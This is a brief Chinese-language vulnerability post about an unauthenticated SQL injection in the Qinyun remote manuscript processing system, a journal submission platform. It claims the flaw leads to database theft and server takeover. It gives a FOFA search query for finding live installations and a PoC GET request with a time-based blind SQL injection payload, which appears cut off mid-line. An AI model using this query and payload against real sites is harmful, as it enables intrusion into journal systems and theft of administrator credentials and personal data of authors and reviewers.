0x01 产品简介
勤云远程稿件处理系统(又称勤云采编系统)是北京勤云科技发展有限公司研发的一款产品,是一款全网络版期刊采编管理系统,旨在解决从投稿到稿件发表整个过程的信息化管理问题。该系统集成了搜索引擎、云计算等先进技术,为编辑部、作者和审稿人提供了便捷、高效的稿件处理平台。功能强大、易用性高、智能性强的期刊采编管理系统。它可以帮助编辑部实现稿件的信息化管理,提高办公效率和质量。同时,系统还提供了丰富的功能模块和成功案例供用户参考和选择。
0x02 漏洞概述
勤云远程稿件处理系统 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x03 复现环境
FOFA:body="北京勤云科技"
0x04 漏洞复现
PoC
GET /burpsuite'if%20db_name(1)='master'%20waitfor%20delay%20&
